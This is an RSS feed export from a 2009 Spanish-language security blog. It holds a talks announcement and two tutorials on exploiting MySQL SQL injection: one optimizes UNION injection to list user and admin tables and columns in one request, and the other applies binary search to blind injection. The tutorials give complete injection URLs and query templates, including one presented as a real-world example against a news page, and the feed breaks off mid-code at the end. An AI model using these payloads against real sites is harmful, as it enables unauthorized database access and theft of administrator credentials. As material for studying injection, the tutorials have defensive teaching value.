<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>.:. Undersecurity .:.</title>
	<atom:link href="http://undersecurity.net/feed" rel="self" type="application/rss+xml" />
	<link>http://undersecurity.net</link>
	<description></description>
	<lastBuildDate>Tue, 08 Sep 2009 01:54:01 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Charlas Agosto 2009</title>
		<link>http://undersecurity.net/charlas/charlas-agosto-2009</link>
		<comments>http://undersecurity.net/charlas/charlas-agosto-2009#comments</comments>
		<pubDate>Tue, 08 Sep 2009 01:53:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Charlas]]></category>
		<category><![CDATA[LFI]]></category>
		<category><![CDATA[Mysql]]></category>
		<category><![CDATA[Php]]></category>
		<category><![CDATA[RFI]]></category>

		<guid isPermaLink="false">http://undersecurity.net/?p=145</guid>
		<description><![CDATA[Las Primeras Charlas Concluyeron con un exito absoluto, Gracias a todos los que participaron en el.

Minería de Datos (OzX)
LFI &#38; RFI: Bypass de filtros &#8211; El pdf de la charla (Seth)
Conexión a Mysql en C [SEC]

Gracias A Toda la Comunidad Mitm.cl Por participar en esta iniciativa 
]]></description>
			<content:encoded><![CDATA[<p>Las Primeras Charlas Concluyeron con un exito absoluto, Gracias a todos los que participaron en el.</p>
<ul>
<li><a href="http://foro.undersecurity.net/read.php?11,4120">Minería de Datos (OzX)</a></li>
<li><a href="http://foro.undersecurity.net/read.php?15,4122,4122#msg-4122">LFI &amp; RFI: Bypass de filtros &#8211; El pdf de la charla (Seth)</a></li>
<li><a href="http://foro.undersecurity.net/read.php?53,4123,4145#msg-4145">Conexión a Mysql en C [SEC]</a></li>
</ul>
<p><em>Gracias A Toda la Comunidad Mitm.cl Por participar en esta iniciativa </em></p>
]]></content:encoded>
			<wfw:commentRss>http://undersecurity.net/charlas/charlas-agosto-2009/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Optimización de SQL Union Injection en MYSQL</title>
		<link>http://undersecurity.net/sql-union-injection/optimizacion-de-sql-union-injection-en-mysql</link>
		<comments>http://undersecurity.net/sql-union-injection/optimizacion-de-sql-union-injection-en-mysql#comments</comments>
		<pubDate>Fri, 31 Jul 2009 03:52:20 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[SQL Union Injection]]></category>

		<guid isPermaLink="false">http://undersecurity.net/?p=93</guid>
		<description><![CDATA[Optimización de SQL Union Injection en MYSQL
Sin lugar a dudas, este es el tipo de inyección que mas fácil se puede obtener información, en un par de consultas se  lograría obtener el nombre de usuario y contraseña del administrador del sistema o de algún usuario con privilegios.
Pero también consta de una etapa que es engorrosa, [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Optimización de SQL Union Injection en MYSQL</strong></p>
<p>Sin lugar a dudas, este es el tipo de inyección que mas fácil se puede obtener información, en un par de consultas se  lograría obtener el nombre de usuario y contraseña del administrador del sistema o de algún usuario con privilegios.<br />
Pero también consta de una etapa que es engorrosa, la obtención de tablas y sus correspondientes campos. Claramente en una base de datos Mysql Versión 5.x.<br />
Gracias a la base de datos information_schema, podemos obtener las tablas y los campos de la base de datos.</p>
<p>La sintaxis Común de la obtención de las tablas es la siguiente.</p>
<div id="wpshdo_1" class="wp-synhighlighter-outer"><div id="wpshdt_1" class="wp-synhighlighter-expanded"><table border="0" width="100%"><tr><td align="left" width="80%"><a name="#codesyntax_1"></a><a id="wpshat_1" class="wp-synhighlighter-title" href="#codesyntax_1"  onClick="javascript:wpsh_toggleBlock(1)" title="Click to show/hide code block">Code block</a></td><td align="right"><a href="#codesyntax_1" onClick="javascript:wpsh_code(1)" title="Show code only"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/code.png" /></a>&nbsp;<a href="#codesyntax_1" onClick="javascript:wpsh_print(1)" title="Print code"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/printer.png" /></a>&nbsp;<a href="#codesyntax_1" onClick="javascript:wpsh_about(1)" title="Show plugin information"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/info.gif" /></a>&nbsp;</td></tr></table></div><div id="wpshdi_1" class="wp-synhighlighter-inner" style="display: block;"><pre class="sql" style="font-family:monospace;"><span class="kw1">SELECT</span><span class="sy0">+</span>table_name<span class="sy0">+</span><span class="kw1">FROM</span><span class="sy0">+</span>information_schema<span class="sy0">.</span><span class="kw1">TABLES</span><span class="sy0">+</span><span class="kw1">WHERE</span><span class="sy0">+</span>table_schema<span class="sy0">=</span><span class="kw1">DATABASE</span><span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">+</span><span class="kw1">LIMIT</span><span class="sy0">+</span><span class="nu0">0</span><span class="sy0">,</span><span class="nu0">1</span></pre></div></div>
<p>Con dicha consulta obtendríamos la primera tabla de la base de datos, luego aumentando el valor de limit podríamos obtener las demás tablas.</p>
<p>Luego de encontrar la tabla que nosotros creemos que contendría la información de los usuarios, procedemos a obtener los campos de dicha tabla.</p>
<p>Por ej. , Para obtener los campos de la tabla “usuarios”.</p>
<p>Debemos transformar el nombre usuarios a su valor hexsql.<br />
<strong>Usuario: 0&#215;7573756172696F73</strong></p>
<div id="wpshdo_2" class="wp-synhighlighter-outer"><div id="wpshdt_2" class="wp-synhighlighter-expanded"><table border="0" width="100%"><tr><td align="left" width="80%"><a name="#codesyntax_2"></a><a id="wpshat_2" class="wp-synhighlighter-title" href="#codesyntax_2"  onClick="javascript:wpsh_toggleBlock(2)" title="Click to show/hide code block">Code block</a></td><td align="right"><a href="#codesyntax_2" onClick="javascript:wpsh_code(2)" title="Show code only"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/code.png" /></a>&nbsp;<a href="#codesyntax_2" onClick="javascript:wpsh_print(2)" title="Print code"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/printer.png" /></a>&nbsp;<a href="#codesyntax_2" onClick="javascript:wpsh_about(2)" title="Show plugin information"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/info.gif" /></a>&nbsp;</td></tr></table></div><div id="wpshdi_2" class="wp-synhighlighter-inner" style="display: block;"><pre class="sql" style="font-family:monospace;"><span class="kw1">SELECT</span><span class="sy0">+</span>column_name<span class="sy0">+</span><span class="kw1">FROM</span><span class="sy0">+</span>information_schema<span class="sy0">.</span><span class="kw1">COLUMNS</span><span class="sy0">+</span><span class="kw1">WHERE</span><span class="sy0">+</span>table_name<span class="sy0">=</span>07573756172696F73<span class="sy0">+</span><span class="kw1">LIMIT</span><span class="sy0">+</span><span class="nu0">0</span><span class="sy0">,</span><span class="nu0">1</span></pre></div></div>
<p>Y así tendríamos los datos necesarios para poder generar la consulta final, hacia la base de datos.<br />
Pero luego de hacerlo varias veces en distintas paginas, esta metodología resulta bastante agobiante,al  tener que consultar cada tabla, cada campo por  separado, es por ello que desarrolle una query que muestra la información que a nosotros nos interesa en 1 sola petición.</p>
<p>Ejemplo Consulta Final:</p>
<pre>Localhost/vulnz.php?id=1+and+1=0+union+select+all+1,2,group_concat(column_name,0x3A,table_name,0x3C62723E),4,5,6+from+information_schema.columns+where+table_name=(select+table_name+from+information_schema.tables+where+table_schema=database()+and+table_name+REGEXP+0x2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A+limit+0,1)+limit+0,1--</pre>
<p><strong>Resultado:</strong></p>
<p><img class="alignnone size-full wp-image-102" title="1" src="http://undersecurity.net/wp-content/uploads/2009/07/11.png" alt="1" width="635" height="291" /></p>
<p><strong>Obtendríamos los valores de la siguiente manera.</strong><br />
<em><br />
Campo, Tabla.</em></p>
<p>Analicemos a Fondo la Consulta.<br />
<strong><br />
Consulta que Obtiene las Columnas en Base a una Tabla.</strong></p>
<div id="wpshdo_3" class="wp-synhighlighter-outer"><div id="wpshdt_3" class="wp-synhighlighter-expanded"><table border="0" width="100%"><tr><td align="left" width="80%"><a name="#codesyntax_3"></a><a id="wpshat_3" class="wp-synhighlighter-title" href="#codesyntax_3"  onClick="javascript:wpsh_toggleBlock(3)" title="Click to show/hide code block">Code block</a></td><td align="right"><a href="#codesyntax_3" onClick="javascript:wpsh_code(3)" title="Show code only"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/code.png" /></a>&nbsp;<a href="#codesyntax_3" onClick="javascript:wpsh_print(3)" title="Print code"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/printer.png" /></a>&nbsp;<a href="#codesyntax_3" onClick="javascript:wpsh_about(3)" title="Show plugin information"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/info.gif" /></a>&nbsp;</td></tr></table></div><div id="wpshdi_3" class="wp-synhighlighter-inner" style="display: block;"><pre class="pascal" style="font-family:monospace;"><span class="sy0">=</span>1<span class="sy0">+</span><span class="kw3">and</span><span class="sy0">+</span>1<span class="sy0">=</span>0<span class="sy0">+</span><span class="kw4">union</span><span class="sy0">+</span>select<span class="sy0">+</span>all<span class="sy0">+</span><span class="nu0">1</span><span class="sy0">,</span><span class="nu0">2</span><span class="sy0">,</span>group_concat<span class="br0">&#40;</span>column_name<span class="sy0">,</span>0x3A<span class="sy0">,</span>table_name<span class="sy0">,</span>0x3C62723E<span class="br0">&#41;</span><span class="sy0">,</span><span class="nu0">4</span><span class="sy0">,</span><span class="nu0">5</span><span class="sy0">,</span><span class="nu0">6</span><span class="sy0">+</span>from<span class="sy0">+</span>information_schema.<span class="me1">columns</span><span class="sy0">+</span>where<span class="sy0">+</span>table_name<span class="sy0">=</span><span class="br0">&#40;</span>CONSULTA_RESTRICCION<span class="br0">&#41;</span><span class="sy0">+</span>limit<span class="sy0">+</span><span class="nu0">0</span><span class="sy0">,</span><span class="nu0">1</span><span class="sy0">--</span></pre></div></div>
<p><strong>Consulta Restricción:</strong> Con Esta Consulta obtendremos la o las tablas que cumplan con la restricción impuesta por la expresión regular.</p>
<div id="wpshdo_4" class="wp-synhighlighter-outer"><div id="wpshdt_4" class="wp-synhighlighter-expanded"><table border="0" width="100%"><tr><td align="left" width="80%"><a name="#codesyntax_4"></a><a id="wpshat_4" class="wp-synhighlighter-title" href="#codesyntax_4"  onClick="javascript:wpsh_toggleBlock(4)" title="Click to show/hide code block">Code block</a></td><td align="right"><a href="#codesyntax_4" onClick="javascript:wpsh_code(4)" title="Show code only"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/code.png" /></a>&nbsp;<a href="#codesyntax_4" onClick="javascript:wpsh_print(4)" title="Print code"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/printer.png" /></a>&nbsp;<a href="#codesyntax_4" onClick="javascript:wpsh_about(4)" title="Show plugin information"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/info.gif" /></a>&nbsp;</td></tr></table></div><div id="wpshdi_4" class="wp-synhighlighter-inner" style="display: block;"><pre class="pascal" style="font-family:monospace;">select<span class="sy0">+</span>table_name<span class="sy0">+</span>from<span class="sy0">+</span>information_schema.<span class="me1">tables</span><span class="sy0">+</span>where<span class="sy0">+</span>table_schema<span class="sy0">=</span>database<span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">+</span><span class="kw3">and</span><span class="sy0">+</span>table_name<span class="sy0">+</span>REGEXP<span class="sy0">+</span>0x2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A<span class="sy0">+</span>limit<span class="sy0">+</span><span class="nu0">0</span><span class="sy0">,</span><span class="nu0">1</span></pre></div></div>
<p>Expresión  Regular.</p>
<p><strong>REGEXP+0&#215;2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A</strong></p>
<div id="wpshdo_5" class="wp-synhighlighter-outer"><div id="wpshdt_5" class="wp-synhighlighter-expanded"><table border="0" width="100%"><tr><td align="left" width="80%"><a name="#codesyntax_5"></a><a id="wpshat_5" class="wp-synhighlighter-title" href="#codesyntax_5"  onClick="javascript:wpsh_toggleBlock(5)" title="Click to show/hide code block">Code block</a></td><td align="right"><a href="#codesyntax_5" onClick="javascript:wpsh_code(5)" title="Show code only"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/code.png" /></a>&nbsp;<a href="#codesyntax_5" onClick="javascript:wpsh_print(5)" title="Print code"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/printer.png" /></a>&nbsp;<a href="#codesyntax_5" onClick="javascript:wpsh_about(5)" title="Show plugin information"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/info.gif" /></a>&nbsp;</td></tr></table></div><div id="wpshdi_5" class="wp-synhighlighter-inner" style="display: block;"><pre class="pascal" style="font-family:monospace;">.<span class="sy0">*</span><span class="br0">&#40;</span><span class="br0">&#40;</span>us<span class="br0">&#91;</span>ue<span class="br0">&#93;</span>|log<span class="br0">&#91;</span>io<span class="br0">&#93;</span>n|adm<span class="br0">&#41;</span><span class="br0">&#41;</span>.<span class="sy0">*</span></pre></div></div>
<p>Con esta Expresión podríamos obtener algunos de los nombres mas comunes de las tablas que contienen información relacionada con los usuarios como podría ser :</p>
<ul>
<li>Usuario</li>
<li>Username</li>
<li>User</li>
<li>Administrador</li>
<li>Administrator</li>
<li>Login</li>
<li>Logon</li>
<li>etc</li>
</ul>
<p><strong>Ejemplo Real:</strong><a style="position: absolute;" href="http://foro.undersecurity.net/read.php?47,3664,3669"></a></p>
<div id="wpshdo_6" class="wp-synhighlighter-outer"><div id="wpshdt_6" class="wp-synhighlighter-expanded"><table border="0" width="100%"><tr><td align="left" width="80%"><a name="#codesyntax_6"></a><a id="wpshat_6" class="wp-synhighlighter-title" href="#codesyntax_6"  onClick="javascript:wpsh_toggleBlock(6)" title="Click to show/hide code block">Code block</a></td><td align="right"><a href="#codesyntax_6" onClick="javascript:wpsh_code(6)" title="Show code only"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/code.png" /></a>&nbsp;<a href="#codesyntax_6" onClick="javascript:wpsh_print(6)" title="Print code"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/printer.png" /></a>&nbsp;<a href="#codesyntax_6" onClick="javascript:wpsh_about(6)" title="Show plugin information"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/info.gif" /></a>&nbsp;</td></tr></table></div><div id="wpshdi_6" class="wp-synhighlighter-inner" style="display: block;"><pre class="pascal" style="font-family:monospace;">http<span class="sy0">:</span><span class="co1">//www.localhost.org/noticias.php?id=39+and+1=2+union+select+1,2,3,4,group_concat(column_name,0x3A,table_name,0x3C62723E),6+from+information_schema.columns+where+table_name=(select+table_name+from+information_schema.tables+where+table_schema=database()+and+table_name+REGEXP+0x2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A+limit+0,1)+limit+0,1--</span></pre></div></div>
<p><img class="alignnone size-full wp-image-137" title="2" src="http://undersecurity.net/wp-content/uploads/2009/07/21.png" alt="2" width="609" height="461" /></p>
<p>Saludos a Todo el Staff de Undersecurity.net</p>
<p>OzX [Undersecurity.net]</p>
]]></content:encoded>
			<wfw:commentRss>http://undersecurity.net/sql-union-injection/optimizacion-de-sql-union-injection-en-mysql/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Busqueda Binaria Aplicada a las Blind SQL Injection</title>
		<link>http://undersecurity.net/blind-sql-injection/busqueda-binaria-aplicada-a-las-blind-sql-injection</link>
		<comments>http://undersecurity.net/blind-sql-injection/busqueda-binaria-aplicada-a-las-blind-sql-injection#comments</comments>
		<pubDate>Fri, 10 Jul 2009 02:38:07 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Blind SQL Injection]]></category>

		<guid isPermaLink="false">http://undersecurity.net/?p=26</guid>
		<description><![CDATA[Búsqueda Binaria Aplicada a las Blind SQL Injection
Antes de empezar me gustaría aclarar algunas cosas:

 No Pretenderé Ocupar conceptos enredados, ni tampoco caer en tecnicismo, lo explicare como yo lo entiendo, y como me fuese gustado que me lo explicaran.
 Esta Publicación esta enfocada a las personas que tengan nociones básicas de Blind SQL Injection, [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Búsqueda Binaria Aplicada a las Blind SQL Injection</strong><br />
Antes de empezar me gustaría aclarar algunas cosas:</p>
<ul>
<li> No Pretenderé Ocupar conceptos enredados, ni tampoco caer en tecnicismo, lo explicare como yo lo entiendo, y como me fuese gustado que me lo explicaran.</li>
<li> Esta Publicación esta enfocada a las personas que tengan nociones básicas de Blind SQL Injection, quienes no saben de qué estoy hablando, es mejor  que busquen algún tutorial de este tipo de vulnerabilidad en <a href="http://foro.undersecurity.net">Nuestra Comunidad</a>. o lean los siguientes conceptos.</li>
</ul>
<p><strong>Conceptos : </strong></p>
<ol>
<li><a href="http://foro.undersecurity.net/index.php?43">Seccion SQL Injection en Undersecurity</a></li>
<li><a href="http://es.wikipedia.org/wiki/ASCII">¿Que es el Formato ASCII?</a></li>
</ol>
<p><strong>Comandos en MYSQL :</strong></p>
<ol>
<li><a href="http://mysql.conclase.net/curso/index.php?fun=SUBSTRING">MID</a></li>
<li><a href="http://mysql.conclase.net/curso/index.php?fun=ASCII">ASCII </a></li>
</ol>
<p><strong> Control De Flujos:</strong></p>
<ol>
<li><a href="http://mysql.conclase.net/curso/index.php?cap=010d">CASE</a></li>
<li><a href="http://mysql.conclase.net/curso/index.php?fun=IF">IF</a></li>
</ol>
<p><strong>Información Blind SQL Injection</strong></p>
<ol>
<li><a href="http://foro.undersecurity.net/read.php?5,940">Blind SQL Injection by Netting </a></li>
</ol>
<p><strong>Información Búsqueda Binaria</strong></p>
<ol>
<li><a href="http://es.wikipedia.org/wiki/Algoritmo_de_b%C3%BAsqueda">Busqueda Binaria</a></li>
<li><a href="http://es.wikipedia.org/wiki/%C3%81rbol_binario">Arbol Binario</a></li>
</ol>
<p><em>Ahora bien empecemos…</em><br />
Las Blind SQL Injection, es un tipo de vulnerabilidad que es bastante común y de una explotación bastante sencilla, pero<span style="color: #ff0000;"><strong> tiene 1 solo problema</strong></span>. <span style="color: #ff0000;"><strong>Es necesario  generar una cantidad de peticiones bastante considerables hasta encontrar un valor verdadero. Por lo que se convierte en una explotación bastante lenta y tediosa.</strong></span><br />
Por Ejemplo, Planteemos el Siguiente Escenario.</p>
<p><strong>Tabla User</strong></p>
<p><img class="alignnone size-full wp-image-42" title="1" src="http://undersecurity.net/wp-content/uploads/2009/07/1.png" alt="1" width="557" height="179" /></p>
<p><strong> Datos Contenidos en la tabla User:</strong></p>
<ul>
<li><strong>Usuario:</strong> Administrador</li>
<li><strong>Password</strong>: Undersecurity</li>
</ul>
<p><img class="alignnone size-full wp-image-45" title="2" src="http://undersecurity.net/wp-content/uploads/2009/07/2.png" alt="2" width="591" height="141" /></p>
<p>Ahora bien, Para Empezar Nosotros Obtendremos el Primer Valor del Usuario, mediante la metodología  Común para explotar las Blind SQL Injection.  (En un Ambiente Controlado dentro de la consola, no es una situación real de explotación).<br />
Para encontrar un valor verdadero tendremos que testear desde el Carácter 32 de la Tabla Ascii Hasta el Valor 122.<br />
Como Podemos Observar en la Siguiente Imagen, el Primer valor del Usuario es “A”, transformado al formato Ascii obtendría el valor de  65.</p>
<p><img class="alignnone size-full wp-image-48" title="3" src="http://undersecurity.net/wp-content/uploads/2009/07/3.png" alt="3" width="537" height="407" /></p>
<p>En la Practica Tendríamos que Generar <strong> 33</strong> <strong>Peticiones</strong> <strong>(65 – 32)</strong> para Recién Obtener el Primer valor del usuario.<br />
Y si nos ponemos  bien extremistas, si el usuario se llamara <em>zamorano</em>, tendríamos que generar <strong> 90 peticiones</strong> para recién Obtener el Valor. Por lo que se hace  bastante lento y tedioso este tipo de explotación.</p>
<p><strong>Ahora viene  la implementación de Búsqueda Binaria.</strong><br />
La Búsqueda Binaria se basa en la teoría de divide y vencerás. La Idea es ir dividiendo  el  rango en mitades.<br />
<strong>Por Ejemplo : </strong>La clave que queremos encontrar es <strong>9.</strong><br />
Tenemos el Siguiente String<br />
arreglo =(1,2,3,4,5,6,7,8,<strong>9</strong>,10,11);<br />
Dividimos en 2 el String Obteniendo.</p>
<ol>
<li>Restricción = ( 1, 2, 3, 4, 5,6 ) false</li>
<li><strong><span style="color: #ff0000;">Restricción =    (6, 7, 8, 9, 10,11) true</span></strong></li>
</ol>
<p><em>Si se fijan la cantidad de números dentro del arreglo, es impar, por lo  que se necesita repetir un numero dentro de los 2 String resultantes (6), para obtener 2 String Con la misma cantidad de caracteres.</em><br />
Y Ahora ¿Cuál seria Nuestro String a Seguir?, El que Tenga Nuestro Valor a Buscar, en este caso el segundo String o la segunda restricción.</p>
<ol>
<li>Restricción = (6, 7,8) false</li>
<li><strong><span style="color: #ff0000;">Restricción = (9, 10,11) true</span><br />
</strong></li>
</ol>
<ol>
<li><strong><span style="color: #000000;"><span style="color: #ff0000;">Restricción =  (9,10) true</span><br />
</span></strong></li>
<li>Restricción =  (10,11) false</li>
</ol>
<ol>
<li><strong><span style="color: #ff0000;">Restricción =  (9) true<br />
</span></strong></li>
<li>Restricción =  (10) false</li>
</ol>
<p>Finalmente obtenemos nuestro valor, dentro de la primera restricción. Con una cantidad de   4 peticiones.</p>
<p><strong>Esta Misma Metodología Ahora la Aplicaremos a una Blind SQL Injection.</strong></p>
<p>Ahora Aplicaremos los Valores de la tabla Ascii desde el valor 32 hasta el 122.</p>
<ul>
<li><strong>Arreglo : </strong>32-122 [Space-z]</li>
<li><strong>Restriccion_1:</strong> 32-72 [Space-M]</li>
<li><strong>Restricción_2:</strong> 72-122 [M-z]</li>
</ul>
<p>Utilizáramos el Siguiente  Consulta SQL.</p>
<p><strong>Query Global:</strong><br />
<div id="wpshdo_7" class="wp-synhighlighter-outer"><div id="wpshdt_7" class="wp-synhighlighter-expanded"><table border="0" width="100%"><tr><td align="left" width="80%"><a name="#codesyntax_7"></a><a id="wpshat_7" class="wp-synhighlighter-title" href="#codesyntax_7"  onClick="javascript:wpsh_toggleBlock(7)" title="Click to show/hide code block">Code block</a></td><td align="right"><a href="#codesyntax_7" onClick="javascript:wpsh_code(7)" title="Show code only"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/code.png" /></a>&nbsp;<a href="#codesyntax_7" onClick="javascript:wpsh_print(7)" title="Print code"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/printer.png" /></a>&nbsp;<a href="#codesyntax_7" onClick="javascript:wpsh_about(7)" title="Show plugin information"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/info.gif" /></a>&nbsp;</td></tr></table></div><div id="wpshdi_7" class="wp-synhighlighter-inner" style="display: block;"><pre class="sql" style="font-family:monospace;"><span class="sy0">+</span><span class="kw1">AND</span><span class="sy0">+</span> <span class="br0">&#40;</span><span class="kw1">SELECT</span><span class="sy0">+</span><span class="kw1">IF</span> <span class="br0">&#40;</span><span class="br0">&#40;</span>ARREGLO<span class="br0">&#41;</span><span class="sy0">,</span> <span class="br0">&#40;</span>RESTRICCION_1<span class="br0">&#41;</span><span class="sy0">,</span> false<span class="br0">&#41;</span><span class="br0">&#41;</span> —</pre></div></div></p>
<p><strong><em>Explicación:</em></strong></p>
<p>Si El valor a encontrar esta entre los valores del arreglo, entonces consultar si están dentro de la primera restricción. por el contrario si el valor a buscar no esta dentro de la primera restricción, entonces esto significa, que esta dentro de la segunda restricción.</p>
<p><strong>Query : Restricción_1</strong></p>
<div id="wpshdo_8" class="wp-synhighlighter-outer"><div id="wpshdt_8" class="wp-synhighlighter-expanded"><table border="0" width="100%"><tr><td align="left" width="80%"><a name="#codesyntax_8"></a><a id="wpshat_8" class="wp-synhighlighter-title" href="#codesyntax_8"  onClick="javascript:wpsh_toggleBlock(8)" title="Click to show/hide code block">Code block</a></td><td align="right"><a href="#codesyntax_8" onClick="javascript:wpsh_code(8)" title="Show code only"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/code.png" /></a>&nbsp;<a href="#codesyntax_8" onClick="javascript:wpsh_print(8)" title="Print code"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/printer.png" /></a>&nbsp;<a href="#codesyntax_8" onClick="javascript:wpsh_about(8)" title="Show plugin information"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/info.gif" /></a>&nbsp;</td></tr></table></div><div id="wpshdi_8" class="wp-synhighlighter-inner" style="display: block;"><pre class="sql" style="font-family:monospace;"><span class="kw1">SELECT</span><span class="sy0">+</span>case<span class="sy0">+</span><span class="br0">&#40;</span>ascii<span class="br0">&#40;</span>mid<span class="br0">&#40;</span><span class="br0">&#40;</span>CONSULTA<span class="br0">&#41;</span><span class="sy0">,</span>SUBSTRING<span class="sy0">,</span><span class="nu0">1</span><span class="br0">&#41;</span><span class="br0">&#41;</span><span class="sy0">+</span>RESTRICCION_1<span class="br0">&#41;</span><span class="sy0">+</span>when<span class="sy0">+</span>true<span class="sy0">+</span>then<span class="sy0">+</span><span class="br0">&#40;</span>true<span class="br0">&#41;</span><span class="sy0">+</span>else<span class="sy0">+</span>false<span class="sy0">+</span>end</pre></div></div>
<p><em><strong>Explicacion : </strong></em></p>
<p>En el caso que el primer valor de la consulta este dentro del rango de la restriccion 1, entonces retornara verdadero. por el contrario retornara falso.</p>
<p><strong>Ahora bien, un Simple Ejemplo :</strong></p>
<ul>
<li><strong>Consulta : </strong></li>
</ul>
<div id="wpshdo_9" class="wp-synhighlighter-outer"><div id="wpshdt_9" class="wp-synhighlighter-expanded"><table border="0" width="100%"><tr><td align="left" width="80%"><a name="#codesyntax_9"></a><a id="wpshat_9" class="wp-synhighlighter-title" href="#codesyntax_9"  onClick="javascript:wpsh_toggleBlock(9)" title="Click to show/hide code block">Code block</a></td><td align="right"><a href="#codesyntax_9" onClick="javascript:wpsh_code(9)" title="Show code only"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/code.png" /></a>&nbsp;<a href="#codesyntax_9" onClick="javascript:wpsh_print(9)" title="Print code"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/printer.png" /></a>&nbsp;<a href="#codesyntax_9" onClick="javascript:wpsh_about(9)" title="Show plugin information"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/info.gif" /></a>&nbsp;</td></tr></table></div><div id="wpshdi_9" class="wp-synhighlighter-inner" style="display: block;"><pre class="sql" style="font-family:monospace;"><span class="kw1">SELECT</span><span class="sy0">+</span>user<span class="br0">&#40;</span><span class="br0">&#41;</span></pre></div></div>
<p><strong>Valor de user () </strong>: Administrador@localhost.com</p>
<p><strong>Valor a Obtener :</strong> A</p>
<p><strong>Valor ASCII </strong>:65</p>
<ul>
<li><strong>Parametros:</strong></li>
</ul>
<p><strong>Arreglo</strong>: 32-122 [Space-z]<br />
<strong>Restriccion_1</strong>: 32-72 [Space-M]<br />
<strong>Restriccion_2</strong>: 72-122 [M-z]</p>
<p><strong>Consulta Completa : </strong></p>
<div id="wpshdo_10" class="wp-synhighlighter-outer"><div id="wpshdt_10" class="wp-synhighlighter-expanded"><table border="0" width="100%"><tr><td align="left" width="80%"><a name="#codesyntax_10"></a><a id="wpshat_10" class="wp-synhighlighter-title" href="#codesyntax_10"  onClick="javascript:wpsh_toggleBlock(10)" title="Click to show/hide code block">Code block</a></td><td align="right"><a href="#codesyntax_10" onClick="javascript:wpsh_code(10)" title="Show code only"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/code.png" /></a>&nbsp;<a href="#codesyntax_10" onClick="javascript:wpsh_print(10)" title="Print code"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/printer.png" /></a>&nbsp;<a href="#codesyntax_10" onClick="javascript:wpsh_about(10)" title="Show plugin information"><img border="0" style="border: 0 none" src="http://undersecurity.net/wp-content/plugins/wp-synhighlight/themes/default/images/info.gif" /></a>&nbsp;</td></tr></table></div><div id="wpshdi_10" class="wp-synhighlighter-inner" style="display: block;"><pre class="sql" style="font-family:monospace;">http:<span class="sy0">//</span>www<span class="sy0">.</span>host<span class="sy0">.</span>com<span class="sy0">/</span>vulnz<span class="sy0">.</span>php?id<span class="sy0">=</span>1<span class="sy0">+</span><span class="kw1">AND</span><span class="sy0">+</span><span 